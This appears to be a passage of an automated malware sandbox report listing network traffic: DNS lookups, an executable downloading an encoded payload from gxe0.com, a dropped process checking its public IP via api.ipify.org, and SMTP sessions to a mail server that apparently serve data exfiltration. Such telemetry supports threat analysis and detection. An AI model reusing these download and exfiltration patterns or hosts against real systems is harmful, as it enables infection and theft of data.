                                                                                                                Nov 26, 2024 08:17:04.866981983 CET5874999351.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:04.867001057 CET5874999351.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:04.867032051 CET5874999351.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:05.314277887 CET5874999351.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:05.371277094 CET49993587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:15.501130104 CET49991587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:15.559118032 CET49993587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:15.621705055 CET5874999151.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:15.679199934 CET5874999351.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:15.911189079 CET5874999151.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:15.911947012 CET49991587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:15.912179947 CET49994587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:15.977025986 CET5874999351.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:15.979208946 CET49993587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:15.979487896 CET49995587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:16.032066107 CET5874999451.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:16.035542965 CET49994587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:16.099551916 CET5874999551.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:16.103516102 CET49995587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:17.343338013 CET5874999451.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:17.364305973 CET5874999551.195.88.199192.168.2.5
                                                                                                                Nov 26, 2024 08:17:17.386888027 CET49994587192.168.2.551.195.88.199
                                                                                                                Nov 26, 2024 08:17:17.418127060 CET49995587192.168.2.551.195.88.199
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 26, 2024 08:12:59.059267044 CET5279653192.168.2.51.1.1.1
                                                                                                                Nov 26, 2024 08:12:59.200037956 CET53527961.1.1.1192.168.2.5
                                                                                                                Nov 26, 2024 08:13:10.313378096 CET5336253192.168.2.51.1.1.1
                                                                                                                Nov 26, 2024 08:13:10.463644981 CET53533621.1.1.1192.168.2.5
                                                                                                                Nov 26, 2024 08:13:11.099513054 CET6154653192.168.2.51.1.1.1
                                                                                                                Nov 26, 2024 08:13:11.244993925 CET53615461.1.1.1192.168.2.5
                                                                                                                Nov 26, 2024 08:13:14.619626045 CET5748853192.168.2.51.1.1.1
                                                                                                                Nov 26, 2024 08:13:14.762836933 CET53574881.1.1.1192.168.2.5
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 26, 2024 08:12:59.059267044 CET192.168.2.51.1.1.10xc630Standard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:10.313378096 CET192.168.2.51.1.1.10xe3edStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:11.099513054 CET192.168.2.51.1.1.10xb942Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:14.619626045 CET192.168.2.51.1.1.10x9cc4Standard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 26, 2024 08:12:59.200037956 CET1.1.1.1192.168.2.50xc630No error (0)gxe0.com198.252.105.91A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:10.463644981 CET1.1.1.1192.168.2.50xe3edNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:11.244993925 CET1.1.1.1192.168.2.50xb942No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:11.244993925 CET1.1.1.1192.168.2.50xb942No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:11.244993925 CET1.1.1.1192.168.2.50xb942No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:13:14.762836933 CET1.1.1.1192.168.2.50x9cc4No error (0)s82.gocheapweb.com51.195.88.199A (IP address)IN (0x0001)false
                                                                                                                • gxe0.com
                                                                                                                • api.ipify.org
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549705198.252.105.914435468C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:13:00 UTC161OUTGET /yak/233_Wisrysxlfss HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                Host: gxe0.com
                                                                                                                2024-11-26 07:13:01 UTC365INHTTP/1.1 200 OK
                                                                                                                Connection: close
                                                                                                                last-modified: Mon, 28 Oct 2024 23:14:08 GMT
                                                                                                                accept-ranges: bytes
                                                                                                                content-length: 2562520
                                                                                                                date: Tue, 26 Nov 2024 07:13:00 GMT
                                                                                                                server: LiteSpeed
                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65
                                                                                                                Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79
                                                                                                                Data Ascii: q6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61
                                                                                                                Data Ascii: s7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f
                                                                                                                Data Ascii: n7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqO
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d
                                                                                                                Data Ascii: qKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprm
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65
                                                                                                                Data Ascii: sLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53
                                                                                                                Data Ascii: u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKS
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69
                                                                                                                Data Ascii: q6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6i
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d
                                                                                                                Data Ascii: nbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm
                                                                                                                2024-11-26 07:13:01 UTC16384INData Raw: 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57
                                                                                                                Data Ascii: oKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKW


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549706104.26.13.2054432140C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:13:12 UTC155OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:13:12 UTC424INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:13:12 GMT
                                                                                                                Content-Type: text/plain
                                                                                                                Content-Length: 11
                                                                                                                Connection: close
                                                                                                                Vary: Origin
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e881316b8a28c81-EWR
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2000&rtt_var=759&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1432074&cwnd=252&unsent_bytes=0&cid=0cbaf27f12c74137&ts=451&x=0"
                                                                                                                2024-11-26 07:13:12 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.549736104.26.13.2054432164C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:13:27 UTC155OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:13:27 UTC399INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:13:27 GMT
                                                                                                                Content-Type: text/plain
                                                                                                                Content-Length: 11
                                                                                                                Connection: close
                                                                                                                Vary: Origin
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e881371cd9c7ca6-EWR
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2030&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1377358&cwnd=232&unsent_bytes=0&cid=7cf2ec5bb8cc2013&ts=508&x=0"
                                                                                                                2024-11-26 07:13:27 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.549752104.26.13.2054435300C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:13:35 UTC155OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                Host: api.ipify.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:13:35 UTC399INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:13:35 GMT
                                                                                                                Content-Type: text/plain
                                                                                                                Content-Length: 11
                                                                                                                Connection: close
                                                                                                                Vary: Origin
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e8813a4ea417c9f-EWR
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1951&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1407907&cwnd=213&unsent_bytes=0&cid=4596ca72d380f1e0&ts=469&x=0"
                                                                                                                2024-11-26 07:13:35 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                Nov 26, 2024 08:13:16.101368904 CET5874970751.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:15 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:13:16.101553917 CET49707587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:13:16.502460957 CET5874970751.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:13:16.502639055 CET49707587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:13:16.903944016 CET5874970751.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:13:22.709223986 CET5874972451.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:22 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:13:22.710015059 CET49724587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:13:23.133065939 CET5874972451.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:13:23.134113073 CET49724587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:13:23.557454109 CET5874972451.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:13:30.363990068 CET5874974251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:30 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
                                                                                                                Nov 26, 2024 08:13:30.364624023 CET49742587192.168.2.551.195.88.199EHLO 609290
                                                                                                                Nov 26, 2024 08:13:30.776823997 CET5874974251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 609290 [8.46.123.75]
                                                                                                                250-SIZE 52428800
                                                                                                                250-8BITMIME
                                                                                                                250-PIPELINING
                                                                                                                250-PIPECONNECT
                                                                                                                250-STARTTLS
                                                                                                                250 HELP
                                                                                                                Nov 26, 2024 08:13:30.777009964 CET49742587192.168.2.551.195.88.199STARTTLS
                                                                                                                Nov 26, 2024 08:13:31.189882994 CET5874974251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                Nov 26, 2024 08:13:37.980855942 CET5874975851.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:37 +0000
                                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                220 and/or bulk e-mail.
